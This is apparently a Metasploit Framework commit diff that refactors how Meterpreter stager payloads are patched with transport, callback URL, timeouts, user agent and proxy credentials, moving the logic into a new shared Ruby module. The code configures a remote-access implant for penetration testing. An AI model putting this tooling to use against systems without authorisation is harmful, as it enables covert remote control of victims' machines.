Patch UA/Proxy settings during migration, lands rapid7#3632

HD Moore · HD Moore · commit 9de4137aa7e9 · 2014-12-16T22:21:48.000-06:00
diff --git a/lib/msf/core/handler/reverse_hop_http.rb b/lib/msf/core/handler/reverse_hop_http.rb
@@ -84,7 +84,7 @@ def start_handler
       return
     end
 
-    # Sometimes you just have to do everything yourself. 
+    # Sometimes you just have to do everything yourself.
     # Declare ownership of this hop and spawn a thread to monitor it.
     self.refs = 1
     ReverseHopHttp.hop_handlers[full_uri] = self
@@ -247,40 +247,20 @@ def send_new_stage
 
     print_status("Preparing stage for next session #{conn_id}")
     blob = stage_payload
-
-    # Replace the user agent string with our option
-    i = blob.index("METERPRETER_UA\x00")
-    if i
-      str = datastore['MeterpreterUserAgent'][0,255] + "\x00"
-      blob[i, str.length] = str
-    end
-
-    # Replace the transport string first (TRANSPORT_SOCKET_SSL)
-    i = blob.index("METERPRETER_TRANSPORT_SSL")
-    if i
-      str = "METERPRETER_TRANSPORT_HTTP#{ssl? ? "S" : ""}\x00"
-      blob[i, str.length] = str
-    end
-
-    conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
-    i = blob.index("https://" + ("X" * 256))
-    if i
-      url = full_uri + conn_id + "/\x00"
-      blob[i, url.length] = url
-    end
-    print_status("Patched URL at offset #{i}...")
-
-    i = blob.index([0xb64be661].pack("V"))
-    if i
-      str = [ datastore['SessionExpirationTimeout'] ].pack("V")
-      blob[i, str.length] = str
-    end
-
-    i = blob.index([0xaf79257f].pack("V"))
-    if i
-      str = [ datastore['SessionCommunicationTimeout'] ].pack("V")
-      blob[i, str.length] = str
-    end
+    #
+    # Patch options into the payload
+    #
+    Rex::Payloads::Meterpreter::Patch.patch_passive_service! blob,
+      :ssl            => ssl?,
+      :url            => url,
+      :expiration     => datastore['SessionExpirationTimeout'],
+      :comm_timeout   => datastore['SessionCommunicationTimeout'],
+      :ua             => datastore['MeterpreterUserAgent'],
+      :proxyhost      => datastore['PROXYHOST'],
+      :proxyport      => datastore['PROXYPORT'],
+      :proxy_type     => datastore['PROXY_TYPE'],
+      :proxy_username => datastore['PROXY_USERNAME'],
+      :proxy_password => datastore['PROXY_PASSWORD']
 
     blob = encode_stage(blob)
 
diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
@@ -2,6 +2,7 @@
 require 'rex/io/stream_abstraction'
 require 'rex/sync/ref'
 require 'msf/core/handler/reverse_http/uri_checksum'
+require 'rex/payloads/meterpreter/patch'
 
 module Msf
 module Handler
@@ -257,86 +258,28 @@ def on_request(cli, req, obj)
         })
 
       when /^\/A?INITM?/
-        url = ''
+        conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
+        url = payload_uri + conn_id + "/\x00"
 
         print_status("#{cli.peerhost}:#{cli.peerport} Staging connection for target #{req.relative_resource} received...")
         resp['Content-Type'] = 'application/octet-stream'
 
         blob = obj.stage_payload
 
-        # Replace the user agent string with our option
-        i = blob.index("METERPRETER_UA\x00")
-        if i
-          str = datastore['MeterpreterUserAgent'][0,255] + "\x00"
-          blob[i, str.length] = str
-          print_status("Patched user-agent at offset #{i}...")
-        end
-
-        # Activate a custom proxy
-        i = blob.index("METERPRETER_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
-        if i
-          if datastore['PROXYHOST']
-            if datastore['PROXYHOST'].to_s != ""
-              proxyhost = datastore['PROXYHOST'].to_s
-              proxyport = datastore['PROXYPORT'].to_s || "8080"
-              proxyinfo = proxyhost + ":" + proxyport
-              if proxyport == "80"
-                proxyinfo = proxyhost
-              end
-              if datastore['PROXY_TYPE'].to_s == 'HTTP'
-                proxyinfo = 'http://' + proxyinfo
-              else #socks
-                proxyinfo = 'socks=' + proxyinfo
-              end
-              proxyinfo << "\x00"
-              blob[i, proxyinfo.length] = proxyinfo
-              print_status("Activated custom proxy #{proxyinfo}, patch at offset #{i}...")
-              #Optional authentification
-              unless (datastore['PROXY_USERNAME'].nil? or datastore['PROXY_USERNAME'].empty?) or
-                (datastore['PROXY_PASSWORD'].nil? or datastore['PROXY_PASSWORD'].empty?) or
-                datastore['PROXY_TYPE'] == 'SOCKS'
-
-                proxy_username_loc = blob.index("METERPRETER_USERNAME_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
-                proxy_username = datastore['PROXY_USERNAME'] << "\x00"
-                blob[proxy_username_loc, proxy_username.length] = proxy_username
-
-                proxy_password_loc = blob.index("METERPRETER_PASSWORD_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
-                proxy_password = datastore['PROXY_PASSWORD'] << "\x00"
-                blob[proxy_password_loc, proxy_password.length] = proxy_password
-              end
-            end
-          end
-        end
-
-        # Replace the transport string first (TRANSPORT_SOCKET_SSL)
-        i = blob.index("METERPRETER_TRANSPORT_SSL")
-        if i
-          str = "METERPRETER_TRANSPORT_HTTP#{ssl? ? "S" : ""}\x00"
-          blob[i, str.length] = str
-        end
-        print_status("Patched transport at offset #{i}...")
-
-        conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
-        i = blob.index("https://" + ("X" * 256))
-        if i
-          url = payload_uri + conn_id + "/\x00"
-          blob[i, url.length] = url
-        end
-        print_status("Patched URL at offset #{i}...")
-
-        i = blob.index([0xb64be661].pack("V"))
-        if i
-          str = [ datastore['SessionExpirationTimeout'] ].pack("V")
-          blob[i, str.length] = str
-        end
-        print_status("Patched Expiration Timeout at offset #{i}...")
-
-        i = blob.index([0xaf79257f].pack("V"))
-        if i
-          str = [ datastore['SessionCommunicationTimeout'] ].pack("V")
-          blob[i, str.length] = str
-        end
-        print_status("Patched Communication Timeout at offset #{i}...")
+        #
+        # Patch options into the payload
+        #
+        Rex::Payloads::Meterpreter::Patch.patch_passive_service! blob,
+          :ssl            => ssl?,
+          :url            => url,
+          :expiration     => datastore['SessionExpirationTimeout'],
+          :comm_timeout   => datastore['SessionCommunicationTimeout'],
+          :ua             => datastore['MeterpreterUserAgent'],
+          :proxyhost      => datastore['PROXYHOST'],
+          :proxyport      => datastore['PROXYPORT'],
+          :proxy_type     => datastore['PROXY_TYPE'],
+          :proxy_username => datastore['PROXY_USERNAME'],
+          :proxy_password => datastore['PROXY_PASSWORD']
 
         resp.body = encode_stage(blob)
 
diff --git a/lib/rex/payloads.rb b/lib/rex/payloads.rb
@@ -1,2 +1,3 @@
 # -*- coding: binary -*-
 require 'rex/payloads/win32'
+require 'rex/payloads/meterpreter'
diff --git a/lib/rex/payloads/meterpreter.rb b/lib/rex/payloads/meterpreter.rb
@@ -0,0 +1,2 @@
+# -*- coding: binary -*-
+require 'rex/payloads/meterpreter/patch'
diff --git a/lib/rex/payloads/meterpreter/patch.rb b/lib/rex/payloads/meterpreter/patch.rb
@@ -0,0 +1,136 @@
+# -*- coding: binary -*-
+
+module Rex
+  module Payloads
+    module Meterpreter
+      ###
+      #
+      # Provides methods to patch options into metsrv stagers
+      #
+      ###
+      module Patch
+
+        # Replace the transport string
+        def self.patch_transport! blob, ssl
+
+          i = blob.index("METERPRETER_TRANSPORT_SSL")
+          if i
+            str = ssl ? "METERPRETER_TRANSPORT_HTTPS\x00" : "METERPRETER_TRANSPORT_HTTP\x00"
+            blob[i, str.length] = str
+          end
+
+        end
+
+        # Replace the URL
+        def self.patch_url! blob, url
+
+          i = blob.index("https://" + ("X" * 256))
+          if i
+            str = url
+            blob[i, str.length] = str
+          end
+
+        end
+
+        # Replace the session expiration timeout
+        def self.patch_expiration! blob, expiration
+
+          i = blob.index([0xb64be661].pack("V"))
+          if i
+            str = [ expiration ].pack("V")
+            blob[i, str.length] = str
+          end
+
+        end
+
+        # Replace the session communication timeout
+        def self.patch_comm_timeout! blob, comm_timeout
+
+          i = blob.index([0xaf79257f].pack("V"))
+          if i
+            str = [ comm_timeout ].pack("V")
+            blob[i, str.length] = str
+          end
+
+        end
+
+        # Replace the user agent string with our option
+        def self.patch_ua! blob, ua
+
+          ua = ua[0,255] + "\x00"
+          i = blob.index("METERPRETER_UA\x00")
+          if i
+            blob[i, ua.length] = ua
+          end
+
+        end
+
+        # Activate a custom proxy
+        def self.patch_proxy! blob, proxyhost, proxyport, proxy_type
+
+          i = blob.index("METERPRETER_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+          if i
+            if proxyhost
+              if proxyhost.to_s != ""
+                proxyhost = proxyhost.to_s
+                proxyport = proxyport.to_s || "8080"
+                proxyinfo = proxyhost + ":" + proxyport
+                if proxyport == "80"
+                  proxyinfo = proxyhost
+                end
+                if proxy_type.to_s == 'HTTP'
+                  proxyinfo = 'http://' + proxyinfo
+                else #socks
+                  proxyinfo = 'socks=' + proxyinfo
+                end
+                proxyinfo << "\x00"
+                blob[i, proxyinfo.length] = proxyinfo
+              end
+            end
+          end
+
+        end
+
+        # Proxy authentification
+        def self.patch_proxy_auth! blob, proxy_username, proxy_password, proxy_type
+
+          unless (proxy_username.nil? or proxy_username.empty?) or
+            (proxy_password.nil? or proxy_password.empty?) or
+            proxy_type == 'SOCKS'
+
+            proxy_username_loc = blob.index("METERPRETER_USERNAME_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+            proxy_username = proxy_username << "\x00"
+            blob[proxy_username_loc, proxy_username.length] = proxy_username
+
+            proxy_password_loc = blob.index("METERPRETER_PASSWORD_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+            proxy_password = proxy_password << "\x00"
+            blob[proxy_password_loc, proxy_password.length] = proxy_password
+          end
+
+        end
+
+        # Patch options into metsrv for reverse HTTP payloads
+        def self.patch_passive_service! blob, options
+
+          patch_transport! blob, options[:ssl]
+          patch_url! blob, options[:url]
+          patch_expiration! blob, options[:expiration]
+          patch_comm_timeout! blob, options[:comm_timeout]
+          patch_ua! blob, options[:ua]
+          patch_proxy!(blob,
+            options[:proxyhost],
+            options[:proxyport],
+            options[:proxy_type]
+          )
+          patch_proxy_auth!(blob,
+            options[:proxy_username],
+            options[:proxy_password],
+            options[:proxy_type]
+          )
+
+        end
+
+      end
+    end
+  end
+end
diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb
@@ -8,6 +8,9 @@
 # argument for moving the meterpreter client into the Msf namespace.
 require 'msf/core/payload/windows'
 
+# Provides methods to patch options into the metsrv stager.
+require 'rex/payloads/meterpreter/patch'
+
 module Rex
 module Post
 module Meterpreter
@@ -228,31 +231,21 @@ def migrate( pid )
 
     if client.passive_service
 
-      # Replace the transport string first (TRANSPORT_SOCKET_SSL
-      i = blob.index("METERPRETER_TRANSPORT_SSL")
-      if i
-        str = client.ssl ? "METERPRETER_TRANSPORT_HTTPS\x00" : "METERPRETER_TRANSPORT_HTTP\x00"
-        blob[i, str.length] = str
-      end
-
-      conn_id = self.client.conn_id
-      i = blob.index("https://" + ("X" * 256))
-      if i
-        str = self.client.url
-        blob[i, str.length] = str
-      end
+      #
+      # Patch options into metsrv for reverse HTTP payloads
+      #
+      Rex::Payloads::Meterpreter::Patch.patch_passive_service! blob,
+        :ssl            =>  client.ssl,
+        :url            =>  self.client.url,
+        :expiration     => self.client.expiration,
+        :comm_timeout   =>  self.client.comm_timeout,
+        :ua             =>  client.exploit_datastore['MeterpreterUserAgent'],
+        :proxyhost      =>  client.exploit_datastore['PROXYHOST'],
+        :proxyport      =>  client.exploit_datastore['PROXYPORT'],
+        :proxy_type     =>  client.exploit_datastore['PROXY_TYPE'],
+        :proxy_username =>  client.exploit_datastore['PROXY_USERNAME'],
+        :proxy_password =>  client.exploit_datastore['PROXY_PASSWORD']
 
-      i = blob.index([0xb64be661].pack("V"))
-      if i
-        str = [ self.client.expiration ].pack("V")
-        blob[i, str.length] = str
-      end
-
-      i = blob.index([0xaf79257f].pack("V"))
-      if i
-        str = [ self.client.comm_timeout ].pack("V")
-        blob[i, str.length] = str
-      end
     end
 
     # Build the migration request

Original file line number	Diff line number	Diff line change
`@@ -1,2 +1,3 @@`
`1`	`1`	`# -- coding: binary --`
`2`	`2`	`require 'rex/payloads/win32'`
	`3`	`+require 'rex/payloads/meterpreter'`
Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,2 @@`
	`1`	`+# -- coding: binary --`
	`2`	`+require 'rex/payloads/meterpreter/patch'`